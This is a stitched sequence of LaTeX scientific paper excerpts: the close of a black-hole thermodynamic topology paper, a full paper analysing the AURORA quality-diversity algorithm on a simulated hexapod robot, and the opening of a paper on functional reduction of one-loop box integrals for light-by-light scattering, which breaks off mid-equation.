One may notice that for the RN-AdS black hole, there may be a merging of three points $z_1,\,z_2,\,z_3$. Indeed, for $\tau=3 \sqrt{6} \pi Q,\, \Lambda=-1/12 Q^2$, we does have this merging point $z_{1,2,3}=\sqrt{6}Q$, calculation indicates that we have
\begin{equation}\label{z123}
\textrm{Res}\mathcal{R}_{RN-AdS} (z_{1,2,3})=0.
\end{equation}
In this case, according to the definition of the winding number (\ref{wind}), we have
\begin{equation}
w_{1,2,3}=\textrm{Sgn}[\textrm{Res}\mathcal{R}(z_i)]=0.
\end{equation}
This result is astonishing, as the winding number of the critical point is zero, different from all other kinds of points, including generation/annihilation points as well as the pole of order 1. Consequently, the critical thermodynamic defect can still be identified by the winding number. However, one other question arises, if we consider the non-linear electromagnetic black hole, which admits multi-critical points \cite{Tavakoli:2022kmo} and then more than three points in Fig. \ref{root_ne} will merge, then one may ask what the local topological properties are for those different multi-merging points. We believe this question deserves further investigation.
\section*{Acknowledgements}
We are grateful to Shao-Wen Wei for useful discussions. M. Z. is supported by the National Natural Science Foundation of China with Grant No. 12005080. J. J. is supported by the National Natural Science Foundation of China with Grant No. 12205014, the Guangdong Basic and Applied Research Foundation with Grant No. 217200003, and the Talents Introduction Foundation of Beijing Normal University with Grant No. 310432102.
\bibliographystyle{jhep}
| 2024-02-18T23:40:18.338Z | 2022-11-29T02:28:25.000Z | algebraic_stack_train_0000 | 2,007 | 5,485 |
|
proofpile-arXiv_065-9817 |
\subsubsection*{Acknowledgments}
\end{document}
\subsubsection*{Acknowledgments}
This work was supported by the Engineering and Physical Sciences Research Council (EPSRC) grant EP/V006673/1 project REcoVER.
We thank the members of the Adaptive and Intelligent Robotics Lab for their very valuable comments.
\section{Introduction}
One of the motivations of using learning algorithms in robotics is to enable robots to discover on their own their abilities.
Ideally, a robot should be able to discover on its own how to manipulate new objects~\citep{johns2016deep} or how to adapt its behaviours when facing an unseen situation like a mechanical damage~\citep{Cully2014robotsanimals}.
However, despite many impressive breakthroughs in learning algorithms for robotics applications during the last decade~\citep{akkaya2019solving, hwangbo2019learning}, these methods still require a significant amount of engineering to become effective, for instance, to define reward functions, state definitions, or characterise the expected behaviours.
Finding all possible behaviours for a robot is an open-ended process, as the set of all achievable robot behaviours is unboundedly complex.
There are plenty of different ways to execute each type of behaviour.
For instance, for moving forward, rotating or jumping, the robot can move at different speeds, and use different locomotion gaits.
Supplementary behaviours can emerge from interactions with objects and with other agents.
An attempt to discover autonomously the behaviours of a robot has been proposed with the AURORA algorithm~\citep{Cully2019,grillotti2021unsupervised}.
This algorithm leverages the creativity of Quality-Diversity (QD) optimisation algorithms to generate a collection of diverse and high-performing behaviours, called a behavioural repertoire.
QD algorithms usually require the definition of a manually-defined Behavioural Descriptor (BD) to characterise the different types of behaviours contained in the repertoire.
Instead, AURORA uses dimensionality-reduction techniques to perform the behavioural characterisation in an unsupervised manner.
The resulting algorithms enable robots to autonomously discover a large diversity of behaviours without requiring a user to define a performance function or a behavioural descriptor.
Nevertheless, in prior work, AURORA has only been used to learn behavioural characterisations from \textit{hand-defined} sensory data.
For example, \citet{grillotti2021unsupervised} use as sensory data a robot picture taken at the end of an episode from an appropriate camera angle.
In that case, a consequent amount of prior information is provided to the algorithm: only the end of the episode should be considered (instead of the full trajectory), and only the given camera angles should be used (instead of other camera angles or joints positions).
In this work, we propose an extended analysis of AURORA{}, where behavioural characterisations are learned based on the complete trajectory of the robot raw states.
In that sense, no prior information is injected in the sensory data.
We evaluated AURORA{} on a simulated hexapod robot with a neural network controller on three tasks: navigation, moving forward with a high velocity, and performing half-rolls.
Furthermore, we compare AURORA{} to several baselines, all of which use hand-coded BDs.
In most cases, the collections obtained via AURORA{} present more diversity than those obtained from hand-coded QD algorithms.
In particular, AURORA{} automatically discovers behaviours that make the robot navigate to diverse positions, while using its legs in diverse ways, and perform half-rolls.
\section{Background}
\subsection{Quality-Diversity Algorithms}
\label{sec:background_qd}
Quality-Diversity (QD) algorithms are a subclass of evolutionary algorithms that aim at finding a container of both diverse and high-performing policies.
In addition to standard evolutionary algorithms, QD algorithms consider a Behavioural Descriptor (BD), which is a low-dimensional vector that characterises the behaviour of a policy.
QD algorithms use the BDs to quantify the novelty of a policy with respect to the solutions already in the container.
The container of policies is filled in an iterative manner, following these steps: (1) policies are selected from the container and undergo random variations (e.g. mutations, cross-overs); (2) their performance score and BD are evaluated; and (3) we try to add them back to the container.
If they are novel enough compared to solutions that are already in the container, they are added to the container.
If they are better than similar policies in the container, they replace these policies.
\subsection{Autonomous Robots Realising their Abilities (AURORA)}
\label{subsec:unsupervised_behaviours}
Quality diversity algorithms are a promising tool to generate a large diversity of behaviours in robotics. However, the definition of the BD space might not always be straightforward when the robot or its capabilities are unknown. AURORA is a QD algorithm designed to discover the abilities of robots, by maximising the diversity of behaviours contained in the repertoire in an unsupervised manner. AURORA automatically defines the BD by encoding the high-dimensional sensory data collected by the robot during an episode.
The encoding can be achieved using any dimensionality reduction technique, such as, Auto-Encoder (AE) \citep{grillotti2021unsupervised} or Principal Component Analysis \citep{Cully2019}.
To generate a behavioural repertoire, AURORA alternates between QD phases and Encoder phases.
During the QD phase, policies undergo the same process as in standard QD algorithms: selection from the container, evaluation, and attempt to add to the container. However, the evaluation is performed in a slightly different way: instead of a low-dimensional BD the QD task returns high-dimensional sensory data, that is then encoded using the dimensionality reduction technique. The latent encoding of the sensory data is used as the BD for the rest of the QD phrase.
During the Encoder phase, the dimensionality reduction structure (e.g. the AE) is trained using the high-dimensional data from all the policies present in the container.
Once the encoder is trained, the unsupervised BDs are recomputed with the new encoder for all policies present in the container.
Alternating these two phases enables AURORA to progressively build its behavioural repertoires by discovering new solutions, while refining its encoding of the high-dimensional sensory data generated by the robot every time new solutions are added to the archive.
In this work, the sensory data collected by the robot corresponds to the full-state trajectory of the robot.
\section{Related Works}
The problem of autonomously finding diverse behaviours has been addressed with Mutual-Information (MI) maximisation approaches \citep{gregor2016variational, eysenbach2018diversity, sharma2019dynamics}.
Such methods aim to maximise the mutual information between the states explored by the robot, and a latent variable representing the behaviour.
Those MI-based approaches then return a single policy, which is conditioned on the behaviour latent variable.
That differs from QD algorithms, which return a container of different policies.
Also, MI-maximisation algorithms do not necessarily require the definition of a BD. For example, in the work of \citet{eysenbach2018diversity}, diverse robotic behaviours are learned from full robot states.
Similarly to AURORA, when the robot states are described with high-dimensional images, an encoder can be used to compute tractable low-dimensional representations \citep{liu2021apt, liu2021aps}.
While sharing the same purpose, QD and MI-maximisation algorithms are fundamentally different in their core design.
Those differences make it challenging to compare the two approaches in a fair manner.
In QD algorithms, selecting the most appropriate definitions for the BD and the performance requires a certain level of expertise.
For instance, the MAP-Elites algorithm \citep{Mouret2015, Cully2014robotsanimals} is often used with the same hexapod robot, but with two different sets of definitions: 1) the leg duty-factor for the BD, defined as the time proportion each leg is in contact with the ground, with the average speed for the performance~\citep{Cully2014robotsanimals,Cully2018QDFramework} or 2) the final location of the robot after walking during three seconds for the BD, with an orientation error for the performance~\citep{Cully2013,duarte2016evorbc,chatzilygeroudis2018reset}.
The resulting behavioural repertoires will find different types of applications.
The first set of definitions is designed for fast damage recovery as it provides a diversity of ways to achieve high-speed gaits, while the second one is designed for navigation tasks as the repertoire enables the robot to move in various directions.
To avoid the expertise requirements in the behaviour descriptor definition, several methods have been proposed to enable the automatic definition of the behavioural descriptors.
As described previously, AURORA aims to tackle this problem by using a dimensionality reduction algorithm (a Deep Auto-Encoder~\citep{masci2011stacked}) to project the features of the solutions into a latent space and use this latent space as a behavioural descriptor space. TAXONS~\citep{Paolo2019taxons} is another QD algorithm adopting the same principle; it demonstrated that this approach can scale to camera images to produce large behavioural repertoires for different types of robots. The same concept was also used in the context of Novelty Search prior to AURORA and TAXONS to generate assets for video games with the DeLeNoX algorithm~\citep{Liapis2013}.
All these methods aim to maximise the diversity of the produced solutions, without specifically considering a downstream task.
A different direction to automatically define a behavioural descriptor is to use Meta-Learning. The idea is to find the BD definition that maximises the performance of the resulting collection of solutions when used in a downstream task. For instance, \citet{bossens2020learning} considers the damage recovery capabilities provided by a behavioural repertoire as a Meta-Learning objective and search for the linear combination of a pre-defined set of behaviour descriptors that will maximise this objective. A related approach proposed by \citet{meyerson2016learning} uses a set of training tasks to learn what would be the most appropriate BD definition to solve a "test task".
\section{Learning Diverse Behaviours from Full-State Trajectories}
In this section, we provide a theoretical analysis of the AURORA algorithm, to support its ability to generate a large collection of diverse behaviours in an unsupervised manner.
In essence, we aim to find a container of policies exhibiting diverse behaviours.
We consider that a \textit{behaviour} is defined as the full-state trajectory: $\vec s_{1:T}$.
Then the overall problem of finding diverse behaviours $\left(\vec s_{1:T}^{(i)}\right)_{i}$ can be expressed as an entropy maximisation problem.
Considering the behaviour $\vec s_{1:T}$ as a random variable, we aim to maximise the entropy of $\vec s_{1:T}$, written $\entropy{\vec s_{1:T}}$.
In the following sections we will explain (1) why it can be ineffective to maximise directly the diversity of full-state trajectories $\vec s_{1:T}$; and (2) how AURORA can be used to maximise indirectly this diversity.
\subsection{Problem with High-dimensional Behavioural Descriptors}
Maximising the entropy of full-state trajectories $\entropy{\vec s_{1:T}}$ is theoretically possible by using a QD algorithm with $\vec s_{1:T}$ as a Behavioural Descriptor (BD).
However, it is computationally inefficient to use QD algorithms with high-dimensional BDs.
Indeed, as the dimensionality of that problem is high, a consequent number of samples of $\vec s_{1:T}$ is required to optimise $\entropy{\vec s_{1:T}}$.
So a significant number of policies is needed in the container.
However, QD algorithms become less efficient when the number of policies increases.
When the number of policies in the container increases, the selection pressure of the container decreases, which means that the policies from the container are mostly less likely to be selected \citep{Cully2018QDFramework}.
Also, in QD algorithms, unstructured containers always rely on the k-nearest neighbours algorithm to compute the novelty of a policy.
And the complexity of that algorithm can be $O\left( \dim{\mathcal{B}}\log \abs{\mathcal{C}} \right)$ in average \citep{bentley1975multidimensional}, and $O\left( \dim{\mathcal{B}} \abs{\mathcal{C}} \right)$ in the worst case ($\mathcal{B}$ refers to the BD space, and $\abs{\mathcal{C}}$ is the number of policies in the container $\mathcal{C}$).
Hence, the computational complexity of one QD generation increases linearly with dimensionality of the BD $\dim{\mathcal{B}}$.
That is why the overall procedure of adding policies to the container at each QD generation may become too computationally expensive if the dimension of $\mathcal{B}$ increases significantly.
\subsection{Learning Low-dimensional Descriptors from High-dimensional State Trajectories}
\label{sec:learning-low-from-high}
\newcommand{\mi}[2]{I\left( #1 , #2 \right)}
The encoder update phase of AURORA optimises the parameters $\vec\eta_{\mathcal{E}}$ of the encoder $\mathcal{E}$; this encoder is then used to define a low-dimensional BD $\vec b_{\encoder}$ from state trajectories: $\vec b_{\encoder} = \mathcal{E}(\states)$.
Figure~\ref{fig:graphical_model} summarises the dependencies between the different variables considered in standard QD algorithms and AURORA.
The mutual information $\mi{\cdot}{\cdot}$ between $\states$ and $\vec b_{\encoder}$ can be expressed in two symmetrical ways:
\begin{align}
\mi{\states}{\vec b_{\encoder}} &= \entropy{\states} - \entropyCond{\states}{\vec b_{\encoder}} \label{eq:mi_obs} \\
\mi{\states}{\vec b_{\encoder}} &= \entropy{\vec b_{\encoder}} - \entropyCond{\vec b_{\encoder}}{\states} \label{eq:mi_bdprop}
\end{align}
As $\vec b_{\encoder}$ is a function of $\states$, we have: $\entropyCond{\vec b_{\encoder}}{\states} = 0$.
Then, from equations~\ref{eq:mi_obs} and~\ref{eq:mi_bdprop} we get:
\begin{align}
\entropy{\states} &= \entropy{\vec b_{\encoder}} + \entropyCond{\states}{\vec b_{\encoder}} \\
&= \entropy{\vec b_{\encoder}} + \entropyCond{\states}{\mathcal{E} \left( \states \right)} \label{eq:entropy_obs_equality}
\end{align}
According to equation~\ref{eq:entropy_obs_equality}, $\entropy{\states}$ can be decomposed into two components:
\begin{itemize}
\item The entropy on the BD space $\entropy{\vec b_{\encoder}}$, which can be maximised via a QD algorithm.
\item The conditional entropy of the state trajectories with respect to their encoding $\entropyCond{\states}{\mathcal{E} \left( \states \right)}$.
This term quantifies the information that is lost between $\states$ and its encoding $\vec b_{\encoder} = \mathcal{E} \left( \states \right)$.
\end{itemize}
Inequality~\ref{eq:entropy_obs_equality} gives a lower bound on the entropy of state trajectories:
\begin{align}
\entropy{\states} \geq \entropy{\vec b_{\encoder}} \label{eq:lower-bound-obs}
\end{align}
And Fano's inequality \citep[p.~38]{cover2012elements} gives a bounding on the differences between those entropies:
\begin{align}
\entropy{\states} - \entropy{\vec b_{\encoder}} &= \entropyCond{\states}{\mathcal{E} \left( \states \right)} \\
\entropy{\states} - \entropy{\vec b_{\encoder}} &\leq \entropy{e} + P(e) \log \card{\mathcal{X}_{\mathcal{O}^T}} \label{eq:inequality_differences}
\end{align}
where $P(e) = P(\states \neq \widehat{\states})$, $\widehat{\states}$ represents a reconstruction of the state trajectories $\states$ from the encoding $\mathcal{E}(\states)=\vec b_{\encoder}$, and $\mathcal{X}_{\mathcal{O}^T}$ represents the discretised support of the state trajectories $\states$.
As explained in section~\ref{subsec:unsupervised_behaviours}, AURORA alternates between two phases: an \textit{encoder update} phase, and a \textit{QD} phase.
During the encoder update phase, we minimise the difference $\entropy{\states} - \entropy{\vec b_{\encoder}}=\entropy{\states} - \entropy{\mathcal{E}(\states)}$ by training the encoder $\mathcal{E}$.
Indeed, training $\mathcal{E}$ will reduce the probability of reconstruction error $P(e)$, with the intention of lessening the difference $\entropy{\states} - \entropy{\vec b_{\encoder}}$ (see inequality~\ref{eq:inequality_differences}).
During the QD phase, now that the difference between both sides of inequality~\ref{eq:lower-bound-obs} is minimised, we increase the lower bound of $\entropy{\states}$, namely $\entropy{\vec b_{\encoder}}$.
As $\vec b_{\encoder}$ is a low-dimensional BD, maximising $\entropy{\vec b_{\encoder}}$ can be intuitively achieved by applying a standard Quality-Diversity algorithm, with $\vec b_{\encoder}$ as BD.
In the end, the two phases of AURORA successively (1)~train the encoder to minimise the difference between the entropy of successive states $\entropy{\vec s_{1:T}}$ and its lower bound $\entropy{\mathcal{E} (\vec s_{1:T})}$, and~(2) use QD iterations, to maximise the lower bound $\entropy{\vec b_{\encoder}} = \entropy{\mathcal{E} (\vec s_{1:T})}$.
This intuitively explains why AURORA can be used to maximise the diversity of full-state trajectories $\vec s_{1:T}$.
\input{figures/graphical_models/all-diagrams-qd-aurora}
\section{Experimental Setup}
\subsection{Agent: Neural-network controlled hexapod}
In all our experiments, our agent consists of a simulated hexapod robot controlled via a neural network controller.
The hexapod robot presents 18 controllable joints (3 per leg).
Each leg $l$ has two Degrees of Freedom: its hip angle $\alpha_l$ and its knee angle $\beta_l$.
The ankle angle is always set to the opposite of the knee angle.
The neural network controller is a Multi-Layer Perceptron with a single hidden layer of size 8.
It takes as input the current joint angles and velocities $(\alpha_l, \beta_l, \dot{\alpha}_l, \dot{\beta}_l)_{1\leq l \leq 6}$ (of dimension 24), and outputs the target values to reach for the joint angles $(\alpha_l, \beta_l)_{1\leq l \leq 6}$ (of dimension 12).
The controller has in total $(24+1)*8 + (8+1)*12 = 308$ independent parameters, operates at a frequency of $50$Hz, while each episode lasts for 3 seconds.
The environment and the controller are deterministic.
\subsection{Dimensionality Reduction Algorithm of AURORA{}}
For each evaluated policy, the state trajectory corresponds to the joint positions, and torso positions and orientations collected at a frequency of 10Hz.
In the end, this represents 18 streams ($(\alpha_i, \beta_i)_{i=1\ldots 6}$, and the positional and rotational coordinates of the torso), with each of those streams containing 30 measurements.
The dimensionality reduction algorithm used in AURORA{} is a reconstruction-based auto-encoder.
The input data is using two 1D convolutional layers, with 128 filters and a kernel of size 3.
Those convolutional layers are followed by one fully-connected linear layer of size 256.
The decoder is made of a fully-connected linear layer of size 256, followed by three 1D deconvolutions with respectively 128, 128 and 18 filters.
The loss function used to train the Encoder corresponds to the mean squared error between the observation passed as input and the reconstruction obtained as output.
The training is performed using the Adam gradient-descent optimiser \citep{kingma2014adam} with $\beta_1=0.9$ and $\beta_2 = 0.999$.
As the encoder needs to be updated less and less frequently as the number of iterations increase, the number of iterations between two encoder updates is linearly increased over time: if the first encoder update happens at iteration 10, then the following encoder updates occur at iterations 30, 60, 100...
\subsection{QD Tasks}
For the hexapod environment, we consider different types of QD Tasks.
A QD task evaluates the diversity and the performance of policies present in the container returned by a QD algorithm.
Each QD task is characterised by a performance score function $\vec \theta \mapsto f(\vec \theta)$, and a BD function $\vec \theta\mapsto \vec b_{\cT}(\vec \theta)$ (where $\vec \theta$ represents the policy parameters).
We consider three QD tasks with the hexapod agent: Navigation (Nav), Moving Forward (Forw), and Half-roll (Roll).
\subsubsection{Navigation (Nav)}
The Navigation task is inspired from \citet{chatzilygeroudis2018reset} and \citet{kaushik2020adaptive}.
This task aims at finding a container of controllers reaching diverse final $(x_T, y_T)$ positions in $T=3$ seconds following circular trajectories.
Hence the hand-coded BD in this case is $\vec b_{\cT} = (x_T, y_T)$, while the performance $f$ is the final orientation error as defined in the literature~\citep{Cully2013,chatzilygeroudis2018reset}.
\subsubsection{Moving Forward (Forw)}
The Moving Forward task is inspired from the work of \citet{Cully2014robotsanimals}, which aims to obtain a container with a variety of ways to move forward at a high velocity.
The hand-coded BD associated to that task $\vec b_{\cT}$ is the Duty Factor, which
evaluates the proportion of time the each leg is in contact with the ground.
The performance score promotes solutions achieving the highest $x$ position at the end of the episode: $f = x_T$.
\subsubsection{Half-roll (Roll)}
Half-roll QD task aims at finding a diversity of ways to perform half-rolls, i.e. behaviours such that the hexapod ends with its back on the floor (where the pitch angle of the torso is approximately equal to $-\frac{\pi}{2}$).
In particular, the behaviours are characterised via the final yaw and roll angle of the torso.
And the performance is measured as the distance between the final pitch angle $\alpha^{pitch}_T$ of the hexapod and $-\frac{\pi}{2}$.
\begin{equation}
\vec b_{\cT} = \left(\alpha^{yaw}_{T}, \alpha^{roll}_{T} \right) \quad
f = - \left\lvert \alpha^{pitch}_{T} - \left(-\frac{\pi}{2}\right) \right\rvert
\end{equation}
\subsection{Metric: Coverage per Minimum Performance}
\label{sec:cov_per_min_fit}
The containers returned by any QD algorithm always result in a trade-off between the diversity and the total performance of the solutions from the container.
%
To evaluate the coverage depending on the quality of the solutions, we study the evolution of the coverage given several minimum performance scores.
%
With a performance $f_{min}$ and a BD space discretised into a grid, we define the \textit{\say{coverage given minimum performance $f_{min}$}} as: the number of cells filled with policies whose performance is higher than $f_{min}$.
The coverage is calculated by discretising the task Behavioural Descriptor (BD) space~$\B_\cT$ into a $50\times 50$ grid.
%
The coverage then corresponds the number of grid cells containing at least one policy from the unstructured container.
\subsection{Compared algorithms and variants}
We compare AURORA (see Section~\ref{subsec:unsupervised_behaviours}), to two different variants having hand-defined BDs: Hand-Coded-$x$ (HC-$x$) and Mean Streams (MeS).
\textbf{Hand-Coded-$x$ (HC-$x$)}: considers a low-dimensional BD that is defined by hand as the BD of the QD task $x$, where $x$ can correspond to any QD task (Navigation, Moving Forward or Half-roll).
The HC variant corresponds to a standard QD algorithm with an unstructured archive~\citep{Cully2018QDFramework} and the mechanism of container size control introduced in previous work \citep{grillotti2021unsupervised}.
\textbf{Mean Streams (MeS)}: uses a BD that encompasses more information from the full-state trajectory than the Hand-Coded variant detailed above.
The BD used by this variant considers the 18 data streams collected by the hexapod, and average each one of those streams to obtain a BD of dimension 18.
The comparison between this variant and AURORA{} will be appropriate to evaluate the utility of the automatic dimensionality reduction algorithm.
\subsection{Implementation Details}
All our experiments were run for 15{,}000 iterations with a uniform QD selector.
We only use polynomial mutations \citep{deb1999nichedpolynomialmutation} as variation operators with $\eta_m = 10$, and a mutation rate of $0.3$.
The target container size set for all algorithms is set to $N_{\cC}^{target}=5{,}000$ for the Moving Forward and the Half-roll tasks.
In the case of the Navigation Task, we set this number to $N_{\cC}^{target}=1{,}500$ to obtain appropriate comparisons between the different approaches.
To keep the container size around $N_{\cC}^{target}$, we perform a container update every $T_{\mathcal{C}} = 10$ iterations (as explained in Section~\ref{sec:background_qd}).
All our implementation is based on Sferes$_{\text{v2}}$ \citep{Mouret2010}
and uses on the DART simulator \citep{lee2018dart}, while the auto-encoders are coded and trained using the C++ API of PyTorch \citep{paszke2019pytorch}.
For each QD task, all variants were run for 10 replications.
\section{Results}
\begin{figure}
\centering
\includegraphics[width=\textwidth]{figures/iclr/01_iclr_archives.pdf}
\caption{Containers returned by the different variants (columns) for each Quality-Diversity task (rows).
%
Each dot corresponds to one policy present in the container, after projection in the Behavioural Descriptor space $\B_\cT$ of the QD task.
%
The colour of each dot is representative of the performance score of the policy.
%
If the container result from a Hand-Coded variant that is not associated to the task (e.g. the container generated by HC-Nav for the Half-roll task), then the solutions are shown in grey.
%
Also, note that the BD space of Duty Factors (second row) has six dimensions, the containers are presented using the same type of grids as in the work of \citet{Cully2014robotsanimals}.
}
\label{fig:iclr_01_archives}
\end{figure}
\begin{figure}
\centering
\includegraphics[width=\textwidth]{figures/iclr/02_iclr_coverage_per_fitness.pdf}
\caption{Coverage per minimum performance (presented in section~\ref{sec:cov_per_min_fit}), considered with all downstream tasks under study.
%
If the container results from a Hand-Coded variant that is not associated to the task (e.g. the container generated by HC-Forw for the Navigation task), then the performance of solutions are not considered, and only the total coverage is presented.
%
The vertical dashed line shows where to read the total coverage (without any minimal performance) achieved by each variant.
%
For each variant, the bold line represents the median coverage; and the shaded area indicates the interquartile range.
}
\label{fig:iclr_02_cov_per_min_fit}
\end{figure}
Our objective is to show that AURORA discovers diversity in all directions of the BD space.
To that end, we take the containers returned by the different algorithms, and we project them in the BD spaces associated to each Quality-Diversity (QD) task.
Then we evaluate the achieved coverage in the BD space by considering the coverage for several minimum performance scores.
From Figure~\ref{fig:iclr_02_cov_per_min_fit}, it can be noticed that AURORA systematically obtains a lower total coverage than the variant using the hand-coded BD of the task (e.g. HC-Forw for the Forward task).
Such variants use a BD that is well-adapted to the QD problem to solve; but this kind of BD requires human expertise to be defined.
AURORA{} can also be compared to Hand-coded containers after a projection in the BD spaces of other tasks, such as the container from HC-Nav projected in the BD space of the Moving Forward task.
We notice that those kinds of containers (shown in grey in Figs~\ref{fig:iclr_01_archives} and~\ref{fig:iclr_02_cov_per_min_fit}) achieve a coverage that is at most equivalent, if not worse, compared to the containers of AURORA.
For example, in the Half-roll task, the Hand-coded baselines HC-Nav and HC-Forw do not find any solution making the hexapod fall on its back; whereas AURORA discovers such behaviours (see in corners of Half-roll containers in Fig.~\ref{fig:iclr_01_archives}).
In the end, AURORA manages to find containers of behaviours exhibiting diversity in all BD spaces.
The MeS variant, whose BD corresponds to the mean of each stream of sensory data, does not provide the same level of efficiency as AURORA.
In the three tasks, AURORA obtains a coverage that is higher or equal to the coverage obtained for MeS (Fig.~\ref{fig:iclr_02_cov_per_min_fit}).
When considering high minimum performance, the gap between the coverages from AURORA and MeS is even more apparent.
This suggests that the automatic definition of an unsupervised BD may improve the performance upon hand-defined BDs, even if those are calculated considering all full states of the robot.
In the end, by considering the entire full-state trajectory of the agent, AURORA can learn a large diversity of skills in an unsupervised manner, which is more general than any of the compared methods.
\section{Conclusion and Future Work}
In this paper, we provided an additional analysis of AURORA, a QD algorithm that automatically defines its BDs.
In that analysis, we studied what kind of behaviours emerge when AURORA encodes the full-state trajectory of an hexapod robot.
Our experimental evaluation demonstrated that AURORA{} autonomously finds diverse types of behaviours such as: navigating to different positions, using its legs in different manners, and performing half-rolls.
In order to limit the computational complexity of AURORA, the container is forced to have a limited size (usually of the order of magnitude of 10{,}000 policies).
This property may prevent the algorithm from exploring in detail all the different types of behaviours in open-ended environments.
For example, it would be interesting to simultaneously obtain a complete behavioural sub-container specialised in half-rolls, and another sub-container specialised in navigation.
This problem has been efficiently addressed by \citet{etcheverry2020imgepholmes} with IMGEP-HOLMES, an algorithm that manages to discover several specialised niches of behaviours.
It would be interesting to study how AURORA could integrate the same mechanisms as IMGEP-HOLMES to handle open-endedness.
It would also be relevant to try our approach on more open-ended problems, where the robot can interact with various objects and other robots.
| 2024-02-18T23:40:18.373Z | 2022-11-29T02:26:39.000Z | algebraic_stack_train_0000 | 2,009 | 4,678 |
|
proofpile-arXiv_065-9827 | \section{Introduction}
In ref.~\cite{Tarasov:2022clb} a method for functional
reduction of one-loop integrals with arbitrary masses and external
momenta was proposed.
In the present article I will describe the application of this method
for calculating one-loop integrals that arise when computing radiative
corrections to important physical processes.
As an example, I chose to calculate integrals required for
radiative corrections to the amplitudes of scattering of light by
light, photon splitting in an external field and Delbr\"{u}ck
scattering.
First calculations of radiative corrections to these
processes were presented in refs.
\cite{Karplus:1950zz}--\cite{Constantini:1971}.
Radiative corrections to the amplitude of the photon splitting in an external
field were considered in refs. \cite{Shima:1966cmi}, \cite{Baier:1974ga}.
Electroweak radiative corrections to the process of
photon-photon scattering were investigated in refs.
\cite{Jikia:1993tc}, \cite{Gounaris:1999gh}.
The study of the scattering of light by
light is an important part of the experimental program at the LHC.
The main experiment in this study is collisions of lead ions.
The first results of these experiments were reported in refs.
\cite{ATLAS:2017fur}, \cite{CMS:2018erd}.
The aim of this paper is to calculate integrals that arise when computing
amplitudes for the processes with four external photons.
Note that integrals of this type can be used to calculate
radiative corrections to other processes, as well as to calculate
diagrams with five and more external lines that can be reduced
to the considered integrals.
\section{Integrals and the functional reduction formula}
We will consider the calculation of integrals of the following type
\begin{equation}
I_4^{(d)}(m_1^2,m_2^2,m_3^2,m_4^2;
s_{12},s_{23},s_{34},s_{14},s_{24},s_{13})
=\frac{1}{i \pi^{d/2}} \int \frac{d^dk_1}{D_1D_2D_3D_4},
\end{equation}
where
\begin{equation}
D_j=(k_1-p_j)^2-m_j^2+i\epsilon,~~~~~~~~s_{ij}=(p_i-p_j)^2.
\label{product4P}
\end{equation}
In what follows, we will omit the small imaginary term $i\epsilon$,
implying that all the masses contain it.
Figure 1 shows diagrams corresponding to the integrals
that we consider in this paper.
\vspace{0.5cm}
\begin{figure}[h]
\begin{center}
\includegraphics[scale=0.9]{boxes4_lin}
\end{center}
\caption{
Diagrams corresponding to scattering of light by light,
photon splitting and Delbr\"{u}ck scattering.
The thick lines correspond to the off-shell photon. }
\end{figure}
To calculate the integral $I_4^{(d)}$, we will need
integrals with fewer propagators:
\begin{eqnarray}
&&
I_3^{(d)}(m_1^2,m_2^2,m_3^2; s_{23},s_{13},s_{12})
=\frac{1}{i \pi^{d/2}} \int \frac{d^dk_1}{D_1D_2D_3},
\\
&&
I_2^{(d)}(m_1^2,m_2^2; s_{12})
=\frac{1}{i \pi^{d/2}} \int \frac{d^dk_1}{D_1D_2},
\\
&&I_1^{(d)}(m_1^2)
=\frac{1}{i \pi^{d/2}} \int \frac{d^dk_1}{D_1}.
\end{eqnarray}
The formula for functional reduction of the integral $I_4^{(d)}$ with
arbitrary masses and kinematic variables
\cite{Tarasov:2022clb} can be represented as,
\begin{eqnarray}
&&I_4^{(d)}(m_1^2,m_2^2,m_3^2,m_4^2; s_{12},s_{23},s_{34},s_{14},s_{24},s_{13})
\nonumber \\
&&~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=
\sum_{k=1}^{24} Q_k
{ B_4^{(d)}(}R^{(k)}_{1},R^{(k)}_{2},R^{(k)}_{3},R^{(k)}_{4}),
\label{I4viaB4}
\end{eqnarray}
where $R^{(k)}_{j}$ are the ratios of the modified Cayley determinant
to the Gram determinant, $Q_k$ are products of the ratios
of polynomials in the squared masses and kinematic variables $s_{ij}$.
The function $B_4^{(d)}$ is defined as follows
\begin{eqnarray}
&&{ B_4^{(d)}(R_1,R_2,R_3,R_4)} \nonumber \\
&&
~~~=I_4^{(d)}(R_1,R_2,R_3,R_4; R_2\!-\!R_1,R_3\!-\!R_2,R_4\!-\!R_3,
R_4\!-\!R_1, R_4\!-\!R_2,R_3\!-\!R_1)
\nonumber \\
&&~~~=\Gamma\left(4-\frac{d}{2}\right)
R_1^{\frac{d}{2}-4}
\int_0^1\int_0^1\int_0^1x_1^2x_2~h_4^{\frac{d}{2}-4} dx_1dx_2dx_3,
\label{int_rep_B4}
\end{eqnarray}
\begin{equation*}
h_4=1-z_1 x_1^2- z_2 x_1^2x_2^2
-z_3 x_1^2x_2^2x_3^2.
\end{equation*}
The variables $z_j$ are simple combinations of $R_i$
\begin{equation}
z_1=1-\frac{R_{2}}{R_{1}},~~~~z_2=\frac{R_{2}-R_{3}}{R_{1}},
~~~~z_3=\frac{R_{3}-R_4}{R_{1}}.
\end{equation}
An explicit formula for the functional reduction of the integral $I_4^{(d)}$
is presented in \cite{Tarasov:2022clb}.
\section{Integral $I_4^{(d)}$ for the light by light scattering amplitude }
The integral required for computing the
light by light scattering amplitude corresponds to the following
values of kinematic variables and masses
\begin{equation}
s_{12}=s_{23}=s_{34}=s_{14}=0,~~~~~~m_j^2=m^2, ~~~~j=1,...,4.
\label{LbyL}
\end{equation}
Inserting these values in the final formula for functional
reduction of the integral $I_4^{(d)}$, given in
\cite{Tarasov:2022clb}, we get
\begin{eqnarray}
&&I_4^{(d)}(m^2,m^2,m^2,m^2; 0,0,0,0,s_{24},s_{13})
=
\nonumber \\
&&~~~~~~~~~~~~~~~
\frac{\tilde{s}_{13}}{(\tilde{s}_{24}+\tilde{s}_{13})} L^{(d)}(\tilde{s}_{13},M_2^2,m^2)
+\frac{\tilde{s}_{24}}{(\tilde{s}_{24}+\tilde{s}_{13})} L^{(d)}(\tilde{s}_{24},M_2^2,m^2),
\label{boxLbyL}
\end{eqnarray}
where
\begin{eqnarray}
&&L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)=
\nonumber \\
&&~~~~~~
I_4^{(d)}\left( m^2-M_2^2, m^2,m^2- \tilde{s}_{ij},m^2;M^2_2,-\tilde{s}_{ij},\tilde{s}_{ij},
M^2_2 ,0,M^2_2-\tilde{s}_{ij} \right),~~~~~
\end{eqnarray}
\begin{equation}
